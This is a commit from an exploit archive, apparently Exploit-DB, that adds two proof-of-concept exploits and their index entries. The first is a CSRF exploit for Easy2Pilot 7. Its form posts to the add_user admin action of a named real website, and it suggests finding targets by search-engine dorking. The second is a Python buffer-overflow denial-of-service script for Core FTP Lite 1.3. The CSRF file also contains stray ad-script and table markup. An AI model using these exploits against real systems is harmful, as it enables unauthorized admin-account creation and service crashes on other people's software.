DB: 2020-02-21

2 changes to exploits/shellcodes Core FTP Lite 1.3 - Denial of Service (PoC) Easy2Pilot 7 - Cross-Site Request Forgery (Add User)
srikwit · Feb 21, 2020 · ed6caf0 · ed6caf0
1 parent 16b4553
commit ed6caf0
Show file tree

Hide file tree

Showing 3 changed files with 78 additions and 0 deletions.
diff --git a/exploits/php/webapps/48099.txt b/exploits/php/webapps/48099.txt
@@ -0,0 +1,48 @@
+# Exploit Title: Easy2Pilot 7 - Cross-Site Request Forgery (Add User)
+# Author: indoushka
+# Date: 2020-02-20
+# Tested on: windows 10 Français V.(Pro) / browser : Mozilla firefox 69.0(32-bit)
+# Vendor: http://easy2pilot-v7.com/
+# CVE: N/A
+
+#poc :
+
+[+] Dorking İn Google Or Other Search Enggine.
+
+[+] save code as poc.html
+
+[+] 
+
+<!DOCTYPE html>
+<html xmlns="http://www.w3.org/1999/xhtml">
+<head profile="http://www.w3.org/2005/10/profile">
+<script data-ad-client="ca-pub-6748326038387042" async src="https://pagead2.googlesyndication.com/pagead/js/adsbygoogle.js"></script>
+</tr>
+                    </table>
+                <br/><br/>
+        <form action="https://immosl.lu/admin.php?action=add_user" method="POST">
+            <table class="modif_utilisateur" border="0" cellpadding="3" cellspacing="0" width="350">
+                <tr>
+                    <td class="tah11" colspan="2" align="center"><B>Nouvel utilisateur : </B></td>
+                </tr>
+                <tr>
+                    <td class="tah11" align="right">Nom d'utilisateur :</td>
+                    <td class="tah11" align="left"><input type="text" name="user" class="form-control" value=""></td>
+                </tr>
+                <tr>
+                    <td class="tah11" align="right">Mot de passe : </td>
+                    <td class="tah11" align="left"><input type="text" name="pass" class="form-control" value=""></td>
+                </tr>
+                <tr>
+                    <td class="tah11" colspan="2" align="center"><input class="btn btn-lg btn-primary" type="submit" value="Ajouter"></td>
+                </tr>
+            </table>
+        </form><br/><br/>
+<div>
+
+
+Greetings to :=========================================================================================================================
+                                                                                                                                      |
+jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * shadow_00715 * LiquidWorm*                                            |        
+                                                                                                                                      |
+=======================================================================================================================================
diff --git a/exploits/windows/dos/48100.py b/exploits/windows/dos/48100.py
@@ -0,0 +1,28 @@
+# Exploit Title : Core FTP Lite 1.3 - Denial of Service (PoC)
+# Exploit Author: Berat Isler
+# Date: 2020-02-20
+# Vendor Homepage: http://www.coreftp.com/
+# Software Link Download:http://tr.oldversion.com/windows/core-ftp-le-1-3cbuild1437
+# Version: Core FTP 1.3cBuild1437
+# Tested on : Windows 7 32-bit
+
+# First step , Run exploit script, it will generate a new file with the name "mi.txt"
+# Then start Core FTP application and find the "username" textbox.
+# After that pate the content of "mi.txt" in to the "username" field like this --> "AAAAAAAAA"
+# Don't need to click anything because application is already crash.
+
+This is the code :
+
+
+#!/usr/bin/python
+
+b0f = "A" * 7000
+payload = b0f
+try:
+    f=open("mi.txt","w")
+    print "[+] Creating %s bytes payload generated .. .. .." %len(payload)
+    f.write(payload)
+    f.close()
+    print "[+] File created :) "
+except:
+    print "File cannot be created :(("
diff --git a/files_exploits.csv b/files_exploits.csv
@@ -6678,6 +6678,7 @@ id,file,description,date,author,type,platform,port
 48031,exploits/windows/dos/48031.txt,"Dota 2 7.23f - Denial of Service (PoC)",2020-02-10,"Bogdan Kurinnoy",dos,windows,
 48034,exploits/linux/dos/48034.py,"usersctp - Out-of-Bounds Reads in sctp_load_addresses_from_init",2020-02-10,"Google Security Research",dos,linux,
 48035,exploits/multiple/dos/48035.txt,"iOS/macOS - Out-of-Bounds Timestamp Write in IOAccelCommandQueue2::processSegmentKernelCommand()",2020-02-10,"Google Security Research",dos,multiple,
+48100,exploits/windows/dos/48100.py,"Core FTP Lite 1.3 - Denial of Service (PoC)",2020-02-20,"berat isler",dos,windows,
 3,exploits/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Local Privilege Escalation",2003-03-30,"Wojciech Purczynski",local,linux,
 4,exploits/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Local Buffer Overflow",2003-04-01,Andi,local,solaris,
 12,exploits/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,local,linux,
@@ -42376,3 +42377,4 @@ id,file,description,date,author,type,platform,port
 48094,exploits/php/webapps/48094.py,"Virtual Freer 1.58 - Remote Command Execution",2020-02-19,SajjadBnd,webapps,php,
 48095,exploits/hardware/webapps/48095.pl,"DBPower C300 HD Camera - Remote Configuration Disclosure",2020-02-19,"Todor Donev",webapps,hardware,
 48098,exploits/hardware/webapps/48098.py,"Nanometrics Centaur 4.3.23 - Unauthenticated Remote Memory Leak",2020-02-19,byteGoblin,webapps,hardware,
+48099,exploits/php/webapps/48099.txt,"Easy2Pilot 7 - Cross-Site Request Forgery (Add User)",2020-02-20,indoushka,webapps,php,